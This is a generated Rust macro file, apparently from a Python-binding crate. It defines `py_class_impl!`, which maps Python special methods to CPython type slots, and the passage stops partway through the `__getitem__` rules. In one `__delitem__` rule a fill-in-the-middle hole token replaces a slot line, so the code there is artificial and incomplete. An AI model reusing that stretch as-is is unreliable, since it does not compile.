// to whom the Software is furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all copies or
// substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
// INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
// FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
// DEALINGS IN THE SOFTWARE.
// !!!!!!!!!!!!!!!!!!!!!!!!!!!
// THIS IS A GENERATED FILE !!
// DO NOT MODIFY !!
// !!!!!!!!!!!!!!!!!!!!!!!!!!!
//
// REGENERATE USING THE MAKEFILE IN ROOT OF REPOSITORY: make build
#[macro_export]
#[doc(hidden)]
macro_rules! py_class_impl {
// TT muncher macro. Results are accumulated in $info $slots $impls and $members.
// Base case: we're done munching and can start producing code:
{ {}
$class:ident $py:ident
/* info: */ {
$base_type:ty,
$size:expr,
{ $( $class_visibility:tt )* },
$gc:tt,
/* data: */ [ $( { $data_offset:expr, $data_name:ident, $data_ty:ty, $init_expr:expr, $init_ty:ty } )* ]
}
$slots:tt { $( $imp:item )* } $members:tt $props:tt
} => {
$crate::py_coerce_item! {
$($class_visibility)* struct $class { _unsafe_inner: $crate::PyObject }
}
$crate::py_impl_to_py_object_for_python_object!($class);
$crate::py_impl_from_py_object_for_python_object!($class);
impl $crate::PythonObject for $class {
#[inline]
fn as_object(&self) -> &$crate::PyObject {
&self._unsafe_inner
}
#[inline]
fn into_object(self) -> $crate::PyObject {
self._unsafe_inner
}
/// Unchecked downcast from PyObject to Self.
/// Undefined behavior if the input object does not have the expected type.
#[inline]
unsafe fn unchecked_downcast_from(obj: $crate::PyObject) -> Self {
$class { _unsafe_inner: obj }
}
/// Unchecked downcast from PyObject to Self.
/// Undefined behavior if the input object does not have the expected type.
#[inline]
unsafe fn unchecked_downcast_borrow_from<'a>(obj: &'a $crate::PyObject) -> &'a Self {
std::mem::transmute(obj)
}
}
impl $crate::PythonObjectWithCheckedDowncast for $class {
#[inline]
fn downcast_from<'p>(py: $crate::Python<'p>, obj: $crate::PyObject) -> Result<$class, $crate::PythonObjectDowncastError<'p>> {
if py.get_type::<$class>().is_instance(py, &obj) {
Ok($class { _unsafe_inner: obj })
} else {
Err($crate::PythonObjectDowncastError::new(
py,
stringify!($class),
obj.get_type(py),
))
}
}
#[inline]
fn downcast_borrow_from<'a, 'p>(py: $crate::Python<'p>, obj: &'a $crate::PyObject) -> Result<&'a $class, $crate::PythonObjectDowncastError<'p>> {
if py.get_type::<$class>().is_instance(py, obj) {
unsafe { Ok(std::mem::transmute(obj)) }
} else {
Err($crate::PythonObjectDowncastError::new(
py,
stringify!($class),
obj.get_type(py),
))
}
}
}
$crate::py_coerce_item! {
impl $crate::py_class::BaseObject for $class {
type InitType = ( $( $init_ty, )* );
#[inline]
fn size() -> usize {
$size
}
unsafe fn alloc(
py: $crate::Python,
ty: &$crate::PyType,
( $( $data_name, )* ): Self::InitType
) -> $crate::PyResult<$crate::PyObject>
{
let obj = <$base_type as $crate::py_class::BaseObject>::alloc(py, ty, ())?;
$( $crate::py_class::data_init::<$data_ty>(py, &obj, $data_offset, $init_expr); )*
Ok(obj)
}
unsafe fn dealloc(py: $crate::Python, obj: *mut $crate::_detail::ffi::PyObject) {
$( $crate::py_class::data_drop::<$data_ty>(py, obj, $data_offset); )*
<$base_type as $crate::py_class::BaseObject>::dealloc(py, obj)
}
}
}
$($imp)*
$crate::py_coerce_item! {
impl $class {
$($class_visibility)* fn create_instance(py: $crate::Python $( , $data_name : $init_ty )* ) -> $crate::PyResult<$class> {
let obj = unsafe {
<$class as $crate::py_class::BaseObject>::alloc(
py, &py.get_type::<$class>(), ( $($data_name,)* )
)
}?;
return Ok($class { _unsafe_inner: obj });
// hide statics in create_instance to avoid name conflicts
static mut TYPE_OBJECT : $crate::_detail::ffi::PyTypeObject
= $crate::py_class_type_object_static_init!($class, $gc, $slots);
static mut INIT_ACTIVE: bool = false;
// trait implementations that need direct access to TYPE_OBJECT
impl $crate::PythonObjectWithTypeObject for $class {
fn type_object(py: $crate::Python) -> $crate::PyType {
unsafe {
if $crate::py_class::is_ready(py, &TYPE_OBJECT) {
$crate::PyType::from_type_ptr(py, &mut TYPE_OBJECT)
} else {
// automatically initialize the class on-demand
<$class as $crate::py_class::PythonObjectFromPyClassMacro>::initialize(py, None)
.expect(concat!("An error occurred while initializing class ", stringify!($class)))
}
}
}
}
impl $crate::py_class::PythonObjectFromPyClassMacro for $class {
fn initialize(py: $crate::Python, module_name: Option<&str>) -> $crate::PyResult<$crate::PyType> {
unsafe {
if $crate::py_class::is_ready(py, &TYPE_OBJECT) {
return Ok($crate::PyType::from_type_ptr(py, &mut TYPE_OBJECT));
}
assert!(!INIT_ACTIVE,
concat!("Reentrancy detected: already initializing class ",
stringify!($class)));
INIT_ACTIVE = true;
let res = init(py, module_name);
INIT_ACTIVE = false;
res
}
}
fn add_to_module(py: $crate::Python, module: &$crate::PyModule) -> $crate::PyResult<()> {
let ty = <$class as $crate::py_class::PythonObjectFromPyClassMacro>::initialize(py, module.name(py).ok())?;
module.add(py, stringify!($class), ty)
}
}
fn init($py: $crate::Python, module_name: Option<&str>) -> $crate::PyResult<$crate::PyType> {
$crate::py_class_type_object_dynamic_init!($class, $py, TYPE_OBJECT, module_name, $slots $props);
$crate::py_class_init_members!($class, $py, TYPE_OBJECT, $members);
unsafe {
if $crate::_detail::ffi::PyType_Ready(&mut TYPE_OBJECT) == 0 {
Ok($crate::PyType::from_type_ptr($py, &mut TYPE_OBJECT))
} else {
Err($crate::PyErr::fetch($py))
}
}
}
}
}
}
};
{ { data $data_name:ident : $data_type:ty; $($tail:tt)* }
$class:ident $py:ident
/* info: */ {
$base_type: ty,
$size: expr,
$class_visibility: tt,
$gc: tt,
[ $( $data:tt )* ]
}
$slots:tt
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py
/* info: */ {
$base_type,
/* size: */ $crate::py_class::data_new_size::<$data_type>($size),
$class_visibility,
$gc,
/* data: */ [
$($data)*
{
$crate::py_class::data_offset::<$data_type>($size),
$data_name,
$data_type,
/* init_expr: */ $data_name,
/* init_ty: */ $data_type
}
]
}
$slots
/* impl: */ {
$($imp)*
impl $class {
fn $data_name<'a>(&'a self, py: $crate::Python<'a>) -> &'a $data_type {
unsafe {
$crate::py_class::data_get::<$data_type>(
py,
&self._unsafe_inner,
$crate::py_class::data_offset::<$data_type>($size)
)
}
}
}
}
$members $props
}};
{ { @shared data $data_name:ident : $data_type:ty; $($tail:tt)* }
$class:ident $py:ident
/* info: */ {
$base_type: ty,
$size: expr,
$class_visibility: tt,
$gc: tt,
[ $( $data:tt )* ]
}
$slots:tt
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py
/* info: */ {
$base_type,
/* size: */ $crate::py_class::data_new_size::<$crate::PySharedRefCell<$data_type>>($size),
$class_visibility,
$gc,
/* data: */ [
$($data)*
{
$crate::py_class::data_offset::<$crate::PySharedRefCell<$data_type>>($size),
$data_name,
/* data_ty: */ $crate::PySharedRefCell<$data_type>,
/* init_expr: */ $crate::PySharedRefCell::<$data_type>::new($data_name),
/* init_ty: */ $data_type
}
]
}
$slots
/* impl: */ {
$($imp)*
impl $class {
fn $data_name<'a>(&'a self, py: $crate::Python<'a>) -> $crate::PySharedRef<'a, $data_type> {
unsafe {
let data = $crate::py_class::data_get::<$crate::PySharedRefCell<$data_type>>(
py,
&self._unsafe_inner,
$crate::py_class::data_offset::<$crate::PySharedRefCell<$data_type>>($size)
);
$crate::PySharedRef::new(py, &self._unsafe_inner, data)
}
}
}
}
$members $props
}};
{ { def __traverse__(&$slf:tt, $visit:ident) $body:block $($tail:tt)* }
$class:ident $py:ident
/* info: */ {
$base_type: ty,
$size: expr,
$class_visibility: tt,
/* gc: */ {
/* traverse_proc: */ None,
$traverse_data: tt
},
$datas: tt
}
$slots:tt
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py
/* info: */ {
$base_type,
$size,
$class_visibility,
/* gc: */ {
/* traverse_proc: */ $class::__traverse__,
$traverse_data
},
$datas
}
$slots
/* impl: */ {
$($imp)*
$crate::py_coerce_item!{
impl $class {
fn __traverse__(&$slf,
$py: $crate::Python,
$visit: $crate::py_class::gc::VisitProc)
-> Result<(), $crate::py_class::gc::TraverseError>
$body
}
}
}
$members $props
}};
{ { def __clear__ (&$slf:ident) $body:block $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_clear: $crate::py_class_tp_clear!($class),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_coerce_item!{
impl $class {
fn __clear__(&$slf, $py: $crate::Python) $body
}
}
}
$members $props
}};
{ { def __abs__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_absolute: $crate::py_class_unary_slot!($class::__abs__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __abs__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __abs__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __abs__" }
};
{ { def __add__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_add: $crate::py_class_numeric_slot!(binary $class::__add__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __add__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __add__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __add__" }
};
{ { def __aenter__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__aenter__ is not supported by py_class! yet." }
};
{ { def __aexit__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__aexit__ is not supported by py_class! yet." }
};
{ { def __aiter__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__aiter__ is not supported by py_class! yet." }
};
{ { def __and__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_and: $crate::py_class_numeric_slot!(binary $class::__and__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __and__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __and__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __and__" }
};
{ { def __await__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__await__ is not supported by py_class! yet." }
};
{ { def __bool__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_bool: $crate::py_class_unary_slot!($class::__bool__, $crate::_detail::libc::c_int, $crate::py_class::slots::BoolConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __bool__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __bool__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __bool__" }
};
{ { def __call__ (&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_call: $crate::py_class_call_slot!{$class::__call__ []},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __call__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { $visibility:vis def __call__ (&$slf:ident) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_call: $crate::py_class_call_slot!{$class::__call__ []},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, $visibility, __call__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __call__ (&$slf:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_call: $crate::py_argparse_parse_plist_impl!{py_class_call_slot {$class::__call__} [] ($($p)+,)},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, pub, __call__(&$slf,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
$members $props
}};
{ { $visibility:vis def __call__ (&$slf:ident, $($p:tt)+) -> $res_type:ty { $( $body:tt )* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_call: $crate::py_argparse_parse_plist_impl!{py_class_call_slot {$class::__call__} [] ($($p)+,)},
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_argparse_parse_plist_impl!{
py_class_impl_item { $class, $py, $visibility, __call__(&$slf,) $res_type; { $($body)* } }
[] ($($p)+,)
}
}
$members $props
}};
{ { def __cmp__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__cmp__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __coerce__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__coerce__ is not supported by py_class! yet." }
};
{ { def __complex__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__complex__ is not supported by py_class! yet." }
};
{ { def __contains__(&$slf:ident, $item:ident : Option<&$item_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
$as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_contains: $crate::py_class_contains_slot!($class::__contains__, [Option<&$item_name>]),
]
$as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __contains__(&$slf,) $res_type; { $($body)* } [{ $item : Option<&$item_name> = {} }] }
}
$members $props
}};
{ { def __contains__(&$slf:ident, $item:ident : &$item_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
$as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_contains: $crate::py_class_contains_slot!($class::__contains__, [&$item_name]),
]
$as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __contains__(&$slf,) $res_type; { $($body)* } [{ $item : &$item_name = {} }] }
}
$members $props
}};
{ { def __contains__(&$slf:ident, $item:ident : $item_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
$as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_contains: $crate::py_class_contains_slot!($class::__contains__, [$item_name]),
]
$as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __contains__(&$slf,) $res_type; { $($body)* } [{ $item : $item_name = {} }] }
}
$members $props
}};
{ { def __contains__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __contains__" }
};
{ { def __del__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__del__ is not supported by py_class!; Use a data member with a Drop impl instead." }
};
{ { def __delattr__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__delattr__ is not supported by py_class! yet." }
};
{ { def __delete__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__delete__ is not supported by py_class! yet." }
};
{ { def __delitem__(&$slf:ident, $key:ident : Option<&$key_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
sdi_setitem: $sdi_setitem_slot_value:tt,
sdi_delitem: {},
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: $sdi_setitem_slot_value,
sdi_delitem: { $crate::py_class_binary_slot!($class::__delitem__, [Option<&$key_name>], $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
]
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __delitem__(&$slf,) $res_type; { $($body)* } [{ $key : Option<&$key_name> = {} }] }
}
$members $props
}};
{ { def __delitem__(&$slf:ident, $key:ident : &$key_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
sdi_setitem: $sdi_setitem_slot_value:tt,
sdi_delitem: {},
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: $sdi_setitem_slot_value,<|fim▁hole|> }
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __delitem__(&$slf,) $res_type; { $($body)* } [{ $key : &$key_name = {} }] }
}
$members $props
}};
{ { def __delitem__(&$slf:ident, $key:ident : $key_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt $as_sequence:tt $as_mapping:tt
/* setdelitem */ [
sdi_setitem: $sdi_setitem_slot_value:tt,
sdi_delitem: {},
]
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number $as_sequence $as_mapping
/* setdelitem */ [
sdi_setitem: $sdi_setitem_slot_value,
sdi_delitem: { $crate::py_class_binary_slot!($class::__delitem__, [$key_name], $crate::_detail::libc::c_int, $crate::py_class::slots::UnitCallbackConverter) },
]
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __delitem__(&$slf,) $res_type; { $($body)* } [{ $key : $key_name = {} }] }
}
$members $props
}};
{ { def __delitem__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __delitem__" }
};
{ { def __dir__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__dir__ is not supported by py_class! yet." }
};
{ { def __div__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__div__ is not supported by py_class! yet." }
};
{ { def __divmod__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_divmod: $crate::py_class_numeric_slot!(binary $class::__divmod__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __divmod__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __divmod__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __divmod__" }
};
{ { def __eq__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__eq__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __float__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__float__ is not supported by py_class! yet." }
};
{ { def __floordiv__($left:ident, $right:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_floor_divide: $crate::py_class_numeric_slot!(binary $class::__floordiv__),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __floordiv__() $res_type; { $($body)* } [ { $left : &$crate::PyObject = {} } { $right : &$crate::PyObject = {} } ] }
}
$members $props
}};
{ { def __floordiv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for binary numeric operator __floordiv__" }
};
{ { def __ge__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__ge__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __get__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__get__ is not supported by py_class! yet." }
};
{ { def __getattr__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__getattr__ is not supported by py_class! yet." }
};
{ { def __getattribute__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__getattribute__ is not supported by py_class! yet." }
};
{ { def __getitem__(&$slf:ident, $key:ident : Option<&$key_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
/* as_mapping */ [ $( $mp_slot_name:ident : $mp_slot_value:expr, )* ]
$setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_item: Some($crate::py_class::slots::sq_item),
]
/* as_mapping */ [
$( $mp_slot_name : $mp_slot_value, )*
mp_subscript: $crate::py_class_binary_slot!($class::__getitem__, [Option<&$key_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __getitem__(&$slf,) $res_type; { $($body)* } [{ $key : Option<&$key_name> = {} }] }
}
$members $props
}};
{ { def __getitem__(&$slf:ident, $key:ident : &$key_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
/* as_mapping */ [ $( $mp_slot_name:ident : $mp_slot_value:expr, )* ]
$setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_item: Some($crate::py_class::slots::sq_item),
]
/* as_mapping */ [
$( $mp_slot_name : $mp_slot_value, )*
mp_subscript: $crate::py_class_binary_slot!($class::__getitem__, [&$key_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __getitem__(&$slf,) $res_type; { $($body)* } [{ $key : &$key_name = {} }] }
}
$members $props
}};
{ { def __getitem__(&$slf:ident, $key:ident : $key_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt $as_number:tt
/* as_sequence */ [ $( $sq_slot_name:ident : $sq_slot_value:expr, )* ]
/* as_mapping */ [ $( $mp_slot_name:ident : $mp_slot_value:expr, )* ]
$setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots $as_number
/* as_sequence */ [
$( $sq_slot_name : $sq_slot_value, )*
sq_item: Some($crate::py_class::slots::sq_item),
]
/* as_mapping */ [
$( $mp_slot_name : $mp_slot_value, )*
mp_subscript: $crate::py_class_binary_slot!($class::__getitem__, [$key_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$setdelitem
}
/* impl: */ {
$($imp)*
